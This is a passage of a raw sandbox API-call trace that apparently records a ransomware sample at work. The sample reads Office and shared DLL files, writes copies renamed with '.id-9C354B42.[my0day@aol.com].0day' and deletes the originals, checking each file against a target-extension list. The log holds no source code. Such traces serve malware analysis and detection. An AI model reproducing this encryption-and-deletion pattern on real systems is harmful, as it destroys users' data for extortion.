1 [0055.381] WriteFile (in: hFile=0x178, lpBuffer=0x3fc20d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc20d0*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.383] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fc20d0 | out: hHeap=0x5f0000) returned 1 [0055.383] CloseHandle (hObject=0x178) returned 1 [0055.383] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.384] lstrlenW (lpString=".doc") returned 4 [0055.384] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.384] lstrlenW (lpString=".docx") returned 5 [0055.384] lstrcmpiW (lpString1=".docx", lpString2="5.DLL") returned -1 [0055.384] lstrlenW (lpString=".pdf") returned 4 [0055.384] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.384] lstrlenW (lpString=".xls") returned 4 [0055.384] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.384] lstrlenW (lpString=".xlsx") returned 5 [0055.384] lstrcmpiW (lpString1=".xlsx", lpString2="5.DLL") returned -1 [0055.384] lstrlenW (lpString=".ppt") returned 4 [0055.384] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.384] lstrlenW (lpString=".zip") returned 4 [0055.384] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.384] lstrlenW (lpString=".rar") returned 4 [0055.384] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.384] lstrlenW (lpString=".bz2") returned 4 [0055.384] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.384] lstrlenW (lpString=".7z") returned 3 [0055.384] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.384] lstrlenW (lpString=".dbf") returned 4 [0055.384] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.384] lstrlenW (lpString=".1cd") returned 4 [0055.384] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.384] lstrlenW (lpString=".jpg") returned 4 [0055.385] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.385] lstrlenW (lpString=".doc") returned 4 [0055.385] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.385] lstrlenW (lpString=".docx") returned 5 [0055.385] lstrcmpiW (lpString1=".docx", lpString2="5.DLL") returned -1 [0055.385] lstrlenW (lpString=".pdf") returned 4 [0055.385] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.385] lstrlenW (lpString=".xls") returned 4 [0055.385] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.385] lstrlenW (lpString=".xlsx") returned 5 [0055.385] lstrcmpiW (lpString1=".xlsx", lpString2="5.DLL") returned -1 [0055.385] lstrlenW (lpString=".ppt") returned 4 [0055.385] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.385] lstrlenW (lpString=".zip") returned 4 [0055.385] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.385] lstrlenW (lpString=".rar") returned 4 [0055.385] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.385] lstrlenW (lpString=".bz2") returned 4 [0055.385] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.385] lstrlenW (lpString=".7z") returned 3 [0055.385] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.385] lstrlenW (lpString=".dbf") returned 4 [0055.385] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.385] lstrlenW (lpString=".1cd") returned 4 [0055.385] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0055.385] lstrlenW (lpString=".jpg") returned 4 [0055.385] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.386] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.386] lstrlenW (lpString="micaut.dll.mui") returned 14 [0055.386] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0056.011] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=8704) returned 1 [0056.012] CloseHandle (hObject=0x170) returned 1 [0056.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui")) returned 0x20 [0056.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.026] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.027] lstrlenW (lpString=".doc") returned 4 [0056.029] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0056.029] lstrlenW (lpString=".docx") returned 5 [0056.029] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0056.029] lstrlenW (lpString=".pdf") returned 4 [0056.029] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0056.029] lstrlenW (lpString=".xls") returned 4 [0056.029] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0056.034] lstrlenW (lpString=".xlsx") returned 5 [0056.089] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0056.305] lstrlenW (lpString=".ppt") returned 4 [0056.306] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0056.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.307] lstrlenW (lpString=".zip") returned 4 [0056.308] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0056.308] lstrlenW (lpString=".rar") returned 4 [0056.308] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0056.308] lstrlenW (lpString=".bz2") returned 4 [0056.308] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0056.308] lstrlenW (lpString=".7z") returned 3 [0056.308] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0056.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.311] lstrlenW (lpString=".dbf") returned 4 [0056.311] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0056.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.311] lstrlenW (lpString=".1cd") returned 4 [0056.311] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0056.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.312] lstrlenW (lpString=".jpg") returned 4 [0056.313] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0056.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.319] lstrlenW (lpString=".doc") returned 4 [0056.319] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0056.319] lstrlenW (lpString=".docx") returned 5 [0056.319] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0056.319] lstrlenW (lpString=".pdf") returned 4 [0056.319] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0056.319] lstrlenW (lpString=".xls") returned 4 [0056.319] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0056.319] lstrlenW (lpString=".xlsx") returned 5 [0056.320] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0056.320] lstrlenW (lpString=".ppt") returned 4 [0056.320] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0056.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.320] lstrlenW (lpString=".zip") returned 4 [0056.320] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0056.320] lstrlenW (lpString=".rar") returned 4 [0056.320] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0056.320] lstrlenW (lpString=".bz2") returned 4 [0056.320] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0056.320] lstrlenW (lpString=".7z") returned 3 [0056.320] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0056.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.320] lstrlenW (lpString=".dbf") returned 4 [0056.320] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0056.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.320] lstrlenW (lpString=".1cd") returned 4 [0056.320] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0056.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0056.320] lstrlenW (lpString=".jpg") returned 4 [0056.320] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0056.320] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0056.320] lstrlenW (lpString="ShapeCollector.exe") returned 18 [0056.320] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0056.470] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=695296) returned 1 [0056.470] CloseHandle (hObject=0x244) returned 1 [0056.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe")) returned 0x20 [0056.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.471] lstrlenW (lpString=".doc") returned 4 [0056.471] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0056.471] lstrlenW (lpString=".docx") returned 5 [0056.471] lstrcmpiW (lpString1=".docx", lpString2="r.exe") returned -1 [0056.471] lstrlenW (lpString=".pdf") returned 4 [0056.471] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0056.471] lstrlenW (lpString=".xls") returned 4 [0056.471] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0056.471] lstrlenW (lpString=".xlsx") returned 5 [0056.471] lstrcmpiW (lpString1=".xlsx", lpString2="r.exe") returned -1 [0056.471] lstrlenW (lpString=".ppt") returned 4 [0056.471] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0056.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.471] lstrlenW (lpString=".zip") returned 4 [0056.471] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0056.471] lstrlenW (lpString=".rar") returned 4 [0056.471] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0056.471] lstrlenW (lpString=".bz2") returned 4 [0056.471] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0056.471] lstrlenW (lpString=".7z") returned 3 [0056.471] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0056.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.472] lstrlenW (lpString=".dbf") returned 4 [0056.472] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0056.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.472] lstrlenW (lpString=".1cd") returned 4 [0056.472] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0056.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.472] lstrlenW (lpString=".jpg") returned 4 [0056.472] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0056.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.472] lstrlenW (lpString=".doc") returned 4 [0056.472] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0056.472] lstrlenW (lpString=".docx") returned 5 [0056.472] lstrcmpiW (lpString1=".docx", lpString2="r.exe") returned -1 [0056.472] lstrlenW (lpString=".pdf") returned 4 [0056.472] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0056.472] lstrlenW (lpString=".xls") returned 4 [0056.472] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0056.472] lstrlenW (lpString=".xlsx") returned 5 [0056.472] lstrcmpiW (lpString1=".xlsx", lpString2="r.exe") returned -1 [0056.472] lstrlenW (lpString=".ppt") returned 4 [0056.472] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0056.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.472] lstrlenW (lpString=".zip") returned 4 [0056.472] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0056.472] lstrlenW (lpString=".rar") returned 4 [0056.472] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0056.472] lstrlenW (lpString=".bz2") returned 4 [0056.472] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0056.472] lstrlenW (lpString=".7z") returned 3 [0056.472] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0056.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.473] lstrlenW (lpString=".dbf") returned 4 [0056.473] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0056.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.473] lstrlenW (lpString=".1cd") returned 4 [0056.473] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0056.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 69 [0056.473] lstrlenW (lpString=".jpg") returned 4 [0056.473] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0056.473] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0056.473] lstrlenW (lpString="ACEODBCI.DLL") returned 12 [0056.473] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0056.473] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=52656) returned 1 [0056.473] CloseHandle (hObject=0x244) returned 1 [0056.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll")) returned 0x20 [0056.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0056.474] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.474] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.474] GetLastError () returned 0x0 [0056.474] ReadFile (in: hFile=0x244, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xcdb0, lpOverlapped=0x0) returned 1 [0056.477] WriteFile (in: hFile=0x17c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xcdc0, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xcdc0, lpOverlapped=0x0) returned 1 [0056.478] ReadFile (in: hFile=0x244, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.478] WriteFile (in: hFile=0x17c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.478] SetEndOfFile (hFile=0x17c) returned 1 [0056.479] CloseHandle (hObject=0x17c) returned 1 [0056.479] SetFilePointerEx (in: hFile=0x244, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.479] SetEndOfFile (hFile=0x244) returned 1 [0056.480] CloseHandle (hObject=0x244) returned 1 [0056.480] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.480] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll")) returned 1 [0056.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.480] lstrlenW (lpString=".doc") returned 4 [0056.480] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.480] lstrlenW (lpString=".docx") returned 5 [0056.481] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0056.481] lstrlenW (lpString=".pdf") returned 4 [0056.481] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.481] lstrlenW (lpString=".xls") returned 4 [0056.481] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.481] lstrlenW (lpString=".xlsx") returned 5 [0056.481] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0056.481] lstrlenW (lpString=".ppt") returned 4 [0056.481] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.481] lstrlenW (lpString=".zip") returned 4 [0056.481] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.481] lstrlenW (lpString=".rar") returned 4 [0056.481] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.481] lstrlenW (lpString=".bz2") returned 4 [0056.481] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.481] lstrlenW (lpString=".7z") returned 3 [0056.481] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.481] lstrlenW (lpString=".dbf") returned 4 [0056.481] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.481] lstrlenW (lpString=".1cd") returned 4 [0056.481] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.481] lstrlenW (lpString=".jpg") returned 4 [0056.481] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.481] lstrlenW (lpString=".doc") returned 4 [0056.481] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.481] lstrlenW (lpString=".docx") returned 5 [0056.481] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0056.482] lstrlenW (lpString=".pdf") returned 4 [0056.482] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.482] lstrlenW (lpString=".xls") returned 4 [0056.482] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.482] lstrlenW (lpString=".xlsx") returned 5 [0056.482] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0056.482] lstrlenW (lpString=".ppt") returned 4 [0056.482] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.482] lstrlenW (lpString=".zip") returned 4 [0056.482] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.482] lstrlenW (lpString=".rar") returned 4 [0056.482] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.482] lstrlenW (lpString=".bz2") returned 4 [0056.482] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.482] lstrlenW (lpString=".7z") returned 3 [0056.482] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.482] lstrlenW (lpString=".dbf") returned 4 [0056.482] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.482] lstrlenW (lpString=".1cd") returned 4 [0056.482] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0056.482] lstrlenW (lpString=".jpg") returned 4 [0056.482] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.482] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0056.483] lstrlenW (lpString="ACERECR.DLL") returned 11 [0056.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0056.483] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=20944) returned 1 [0056.483] CloseHandle (hObject=0x244) returned 1 [0056.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll")) returned 0x20 [0056.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: 